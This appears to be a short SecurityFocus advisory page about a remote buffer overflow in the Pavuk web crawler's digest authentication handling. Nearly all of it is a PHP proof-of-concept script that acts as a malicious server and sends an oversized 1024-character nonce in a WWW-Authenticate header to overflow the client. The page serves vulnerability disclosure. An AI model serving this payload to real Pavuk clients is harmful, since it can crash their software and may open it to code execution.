Pavuk Remote Digest Authentication Buffer Overflow Vulnerability

The following proof of concept is available:

<?php
$buffer = "";
for ($i = 0; $i < 1024; $i++) {
$buffer .= "A";
}
header("WWW-Authenticate: Digest realm=\"Secured by Digest Auth\"
opaque=\"opaque\" nonce=\"$buffer\"");
header("Status: 401 Not Authorized");
?>


 

Privacy Statement
Copyright 2010, SecurityFocus